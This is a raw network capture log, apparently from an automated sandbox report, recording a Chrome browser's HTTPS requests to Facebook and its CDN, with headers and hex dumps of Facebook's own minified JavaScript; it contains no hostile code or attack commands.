                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC1500INData Raw: 7a 65 3a 22 78 6e 67 6e 73 6f 32 22 2c 77 6f 72 64 57 72 61 70 3a 22 78 31 76 76 6b 62 73 22 2c 24 24 63 73 73 3a 21 30 7d 2c 68 72 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 78 34 32 78 30 79 61 22 2c 62 6f 72 64 65 72 54 6f 70 53 74 79 6c 65 3a 22 78 31 65 6a 71 33 31 6e 22 2c 62 6f 72 64 65 72 45 6e 64 53 74 79 6c 65 3a 22 78 64 31 30 72 78 78 22 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 53 74 79 6c 65 3a 22 78 31 73 79 30 65 74 72 22 2c 62 6f 72 64 65 72 53 74 61 72 74 53 74 79 6c 65 3a 22 78 31 37 72 30 74 65 65 22 2c 62 6f 72 64 65 72 54 6f 70 57 69 64 74 68 3a 22 78 39 37 32 66 62 66 22 2c 62 6f 72 64 65 72 45 6e 64 57 69 64 74 68 3a 22 78 63 66 75 78 36 6c 22 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 57 69 64 74 68 3a 22 78 31 71 68 68 39
                                                                                                                                                                                                                                Data Ascii: ze:"xngnso2",wordWrap:"x1vvkbs",$$css:!0},hr:{backgroundColor:"x42x0ya",borderTopStyle:"x1ejq31n",borderEndStyle:"xd10rxx",borderBottomStyle:"x1sy0etr",borderStartStyle:"x17r0tee",borderTopWidth:"x972fbf",borderEndWidth:"xcfux6l",borderBottomWidth:"x1qhh9
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC14884INData Raw: 73 74 2c 62 2e 62 6c 6f 63 6b 5d 3b 65 3d 7b 61 3a 65 2c 61 72 74 69 63 6c 65 3a 66 2c 61 73 69 64 65 3a 64 2c 62 3a 6f 2c 62 64 69 3a 70 2c 62 64 6f 3a 71 2c 62 6c 6f 63 6b 71 75 6f 74 65 3a 72 2c 62 72 3a 73 2c 62 75 74 74 6f 6e 3a 74 2c 63 6f 64 65 3a 75 2c 64 65 6c 3a 76 2c 64 69 76 3a 77 2c 65 6d 3a 78 2c 66 69 65 6c 64 73 65 74 3a 79 2c 66 6f 6f 74 65 72 3a 7a 2c 66 6f 72 6d 3a 41 2c 68 31 3a 42 2c 68 32 3a 42 2c 68 33 3a 42 2c 68 34 3a 42 2c 68 35 3a 42 2c 68 36 3a 42 2c 68 65 61 64 65 72 3a 43 2c 68 72 3a 44 2c 69 3a 45 2c 69 6d 67 3a 46 2c 69 6e 70 75 74 3a 47 2c 69 6e 73 3a 48 2c 6b 62 64 3a 49 2c 6c 61 62 65 6c 3a 4a 2c 6c 69 3a 4b 2c 6d 61 69 6e 3a 4c 2c 6e 61 76 3a 4d 2c 6f 6c 3a 4e 2c 6f 70 74 67 72 6f 75 70 3a 4f 2c 6f 70 74 69 6f 6e 3a 50
                                                                                                                                                                                                                                Data Ascii: st,b.block];e={a:e,article:f,aside:d,b:o,bdi:p,bdo:q,blockquote:r,br:s,button:t,code:u,del:v,div:w,em:x,fieldset:y,footer:z,form:A,h1:B,h2:B,h3:B,h4:B,h5:B,h6:B,header:C,hr:D,i:E,img:F,input:G,ins:H,kbd:I,label:J,li:K,main:L,nav:M,ol:N,optgroup:O,option:P
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC16384INData Raw: 64 65 72 22 29 2e 48 65 72 6f 50 6c 61 63 65 68 6f 6c 64 65 72 55 74 69 6c 73 2e 63 72 65 61 74 65 54 68 65 6e 61 62 6c 65 44 65 73 63 72 69 70 74 69 6f 6e 28 61 2e 74 68 65 6e 61 62 6c 65 73 29 7c 7c 22 4e 6f 20 50 72 6f 6d 69 73 65 73 22 3b 72 65 74 75 72 6e 20 61 2b 62 7d 66 75 6e 63 74 69 6f 6e 20 62 61 28 61 2c 62 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 64 3d 7b 63 6f 6d 6d 69 74 43 6f 75 6e 74 3a 30 2c 6c 61 73 74 42 61 73 65 44 75 72 61 74 69 6f 6e 3a 30 2c 6d 61 78 42 61 73 65 44 75 72 61 74 69 6f 6e 3a 30 2c 74 6f 74 61 6c 41 63 74 75 61 6c 44 75 72 61 74 69 6f 6e 3a 30 2c 74 6f 74 61 6c 43 6f 6d 6d 69 74 44 75 72 61 74 69 6f 6e 3a 30 2c 74 6f 74 61 6c 50 6f 73 74 43 6f 6d 6d 69 74 44 75 72 61 74 69
                                                                                                                                                                                                                                Data Ascii: der").HeroPlaceholderUtils.createThenableDescription(a.thenables)||"No Promises";return a+b}function ba(a,b){if(a==null)return null;var d={commitCount:0,lastBaseDuration:0,maxBaseDuration:0,totalActualDuration:0,totalCommitDuration:0,totalPostCommitDurati
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC16384INData Raw: 74 69 6f 6e 20 6f 28 61 2c 62 29 7b 61 3d 61 2e 64 61 74 61 3b 76 61 72 20 63 3d 61 21 3d 6e 75 6c 6c 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 29 29 3a 6e 75 6c 6c 3b 63 21 3d 6e 75 6c 6c 26 26 62 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 64 65 6c 65 74 65 20 63 5b 61 5d 7d 29 3b 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 70 28 61 2c 62 2c 64 2c 65 2c 66 29 7b 66 6f 72 28 76 61 72 20 67 20 69 6e 20 65 29 7b 76 61 72 20 68 3b 69 66 28 28 68 3d 61 2e 71 70 6c 50 6f 69 6e 74 46 69 6c 74 65 72 52 65 67 65 78 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 68 2e 65 78 65 63 28 67 29 29 63 6f 6e 74 69 6e 75 65 3b 66 6f 72 28 68 3d 30 3b 68 3c 65 5b 67 5d 2e 6c 65 6e 67
                                                                                                                                                                                                                                Data Ascii: tion o(a,b){a=a.data;var c=a!=null?JSON.parse(JSON.stringify(a)):null;c!=null&&b.forEach(function(a){return delete c[a]});return c}function p(a,b,d,e,f){for(var g in e){var h;if((h=a.qplPointFilterRegex)==null?void 0:h.exec(g))continue;for(h=0;h<e[g].leng
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC14884INData Raw: 69 6f 6e 28 61 2c 62 29 7b 62 3d 3d 3d 76 6f 69 64 20 30 26 26 28 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 3b 76 61 72 20 63 3d 64 28 22 68 65 72 6f 2d 74 72 61 63 69 6e 67 22 29 2e 48 65 72 6f 4c 6f 67 67 65 72 2e 67 65 6e 48 65 72 6f 49 6e 74 65 72 61 63 74 69 6f 6e 55 55 49 44 41 6e 64 4d 61 72 6b 53 74 61 72 74 28 61 2e 69 6e 74 65 72 61 63 74 69 6f 6e 49 44 2c 61 2e 73 74 61 72 74 54 69 6d 65 29 3b 72 65 74 75 72 6e 20 77 2e 74 72 61 63 65 28 61 2e 63 66 67 2c 61 2e 64 65 70 73 2c 61 2e 71 70 6c 45 76 65 6e 74 2c 62 2c 61 2e 69 6e 74 65 72 61 63 74 69 6f 6e 43 6c 61 73 73 2c 61 2e 74 72 61 63 65 54 79 70 65 2c 61 2e 74 72 61 63 65 50 6f 6c 69 63 79 2c 63 2c 61 2e 73 74 61 72 74 54 69 6d 65 2c 61 2e 65 76 65 6e 74 51 75 65 75 65 54 69 6d 65 2c 61
                                                                                                                                                                                                                                Data Ascii: ion(a,b){b===void 0&&(b=function(){});var c=d("hero-tracing").HeroLogger.genHeroInteractionUUIDAndMarkStart(a.interactionID,a.startTime);return w.trace(a.cfg,a.deps,a.qplEvent,b,a.interactionClass,a.traceType,a.tracePolicy,c,a.startTime,a.eventQueueTime,a


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                73192.168.2.449824157.240.251.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC875OUTGET /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923890061341413&__req=1&__rev=1016900551&__s=fcmjky%3Ao76ejb%3A95nhjd&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585655&__user=0&dpr=1&jazoest=21020&locale=ru_RU&lsd=AVrwfIkMup0 HTTP/1.1
                                                                                                                                                                                                                                Host: www.facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; _js_datr=d934ZsjiAffZHUJjG80fHvH1; wd=1280x907
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923929801929566", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923929801929566"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC1706INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                74192.168.2.449825157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC374OUTGET /rsrc.php/v3/y8/r/fCWCnWQldVh.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: a5N7LjU0LqOqa0IWOh0OgA==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 22:11:41 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: OS4yGe0HcuuImv0QuG04G3QEo3sBRVvVvnfxzugCEZmlbAI+YDBiwHnVIzHOT9vzZKlrur0mYOIgaLv43ET7XQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:24 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 10762
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC10761INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 75 74 74 6f 6e 22 2c 5b 22 63 73 78 22 2c 22 63 78 22 2c 22 69 6e 76 61 72 69 61 6e 74 22 2c 22 43 53 53 22 2c 22 44 4f 4d 22 2c 22 44 61 74 61 53 74 6f 72 65 22 2c 22 45 76 65 6e 74 22 2c 22 50 61 72 65 6e 74 22 2c 22 65 6d 70 74 79 46 75 6e 63 74 69 6f 6e 22 2c 22 69 73 4e 6f 64 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 29 7b 76 61 72 20 6b 3d 22 75 69 42 75 74 74 6f 6e 44 69 73 61 62 6c 65 64 22 2c 6c 3d 22 75 69 42 75 74 74 6f 6e 44 65 70 72 65 73 73 65 64 22 2c 6d 3d 22 5f 34 32 66 72 22 2c 6e 3d 22 5f 34 32 66 73 22 2c 6f 3d 22 62 75 74 74 6f 6e 3a 62 6c 6f 63 6b 65 72 22 2c 70 3d 22 68 72 65 66 22 2c 71 3d 22 61 6a 61 78
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("Button",["csx","cx","invariant","CSS","DOM","DataStore","Event","Parent","emptyFunction","isNode"],(function(a,b,c,d,e,f,g,h,i,j){var k="uiButtonDisabled",l="uiButtonDepressed",m="_42fr",n="_42fs",o="button:blocker",p="href",q="ajax


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                75192.168.2.449826157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC374OUTGET /rsrc.php/v3/yT/r/wc_C9ZEewR3.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: MNmf+dATD/FezUb5xIFrpg==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 19:06:04 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: 7TVPOiBcIgAp4qhjjFiT3k0/PMvELTdLXLSLQgsEAN9XoECggBTibHEWFE1IeLbnCTxmfCbFvtHr7KlZd1Puug==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:24 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 45002
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC15871INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 63 74 6f 72 55 52 49 22 2c 5b 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 2c 22 55 52 49 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 68 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 68 7c 7c 28 68 3d 63 28 22 55 52 49 22 29 29 29 28 61 29 2e 61 64 64 51 75 65 72 79 44 61 74 61 28 63 28 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 29 2e 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 2c 62 29 7d 67 2e 63 72 65 61 74 65 3d 61 3b 67 2e 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 3d 63 28 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 29 2e 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 7d 29 2c
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("ActorURI",["ActorURIConfig","URI"],(function(a,b,c,d,e,f,g){var h;function a(a,b){return new(h||(h=c("URI")))(a).addQueryData(c("ActorURIConfig").PARAMETER_ACTOR,b)}g.create=a;g.PARAMETER_ACTOR=c("ActorURIConfig").PARAMETER_ACTOR}),
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC16384INData Raw: 2e 66 6c 61 74 74 65 6e 54 6f 41 72 72 61 79 28 29 3a 61 7d 29 2c 64 3d 62 28 22 66 6c 61 74 74 65 6e 41 72 72 61 79 22 29 28 64 29 29 3b 72 65 74 75 72 6e 20 62 28 22 63 72 3a 36 31 31 34 22 29 2e 63 72 65 61 74 65 28 61 2c 63 2c 64 29 7d 3b 67 5b 61 5d 3d 63 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 67 7d 29 2c 6e 75 6c 6c 29 3b 0a 5f 5f 64 28 22 4c 69 6e 6b 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 5b 22 44 61 74 61 53 74 6f 72 65 22 2c 22 45 76 65 6e 74 22 2c 22 50 61 72 65 6e 74 22 2c 22 72 65 6d 6f 76 65 46 72 6f 6d 41 72 72 61 79 22 2c 22 74 72 61 63 6b 52 65 66 65 72 72 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 68 3d 22 40 40 4c 69 6e 6b 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 69 3d 5b 5d 2c 6a 3d 5b
                                                                                                                                                                                                                                Data Ascii: .flattenToArray():a}),d=b("flattenArray")(d));return b("cr:6114").create(a,c,d)};g[a]=c});e.exports=g}),null);__d("LinkController",["DataStore","Event","Parent","removeFromArray","trackReferrer"],(function(a,b,c,d,e,f,g){var h="@@LinkController",i=[],j=[
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC12746INData Raw: 49 6e 73 74 61 6e 63 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 3b 77 68 69 6c 65 28 61 29 7b 76 61 72 20 65 3d 64 28 22 44 61 74 61 53 74 6f 72 65 22 29 2e 67 65 74 28 61 2c 22 74 6f 67 67 6c 65 72 22 29 3b 69 66 28 65 29 72 65 74 75 72 6e 20 65 3b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 29 69 66 28 64 28 22 43 53 53 22 29 2e 68 61 73 43 6c 61 73 73 28 61 2c 22 75 69 54 6f 67 67 6c 65 43 6f 6e 74 65 78 74 22 29 29 72 65 74 75 72 6e 20 62 2e 63 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 61 29 3b 65 6c 73 65 20 69 66 28 21 63 28 22 6b 69 6c 6c 73 77 69 74 63 68 22 29 28 22 4a 45 57 45 4c 5f 54 4f 47 47 4c 45 52 5f 49 4e 53 54 41 4e 43 45 5f 46 49 58 45 53 22 29 26 26 64 28 22 43 53 53 22 29 2e 68 61 73 43 6c 61 73 73 28
                                                                                                                                                                                                                                Data Ascii: Instance=function(a){a=a;while(a){var e=d("DataStore").get(a,"toggler");if(e)return e;if(a instanceof Element)if(d("CSS").hasClass(a,"uiToggleContext"))return b.createInstance(a);else if(!c("killswitch")("JEWEL_TOGGLER_INSTANCE_FIXES")&&d("CSS").hasClass(


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                76192.168.2.449827157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC374OUTGET /rsrc.php/v3/yT/r/DHWoESmf_2P.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: BOsB5wO8Yj0/bkLXEdvZCA==
                                                                                                                                                                                                                                Expires: Sat, 20 Sep 2025 08:39:35 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
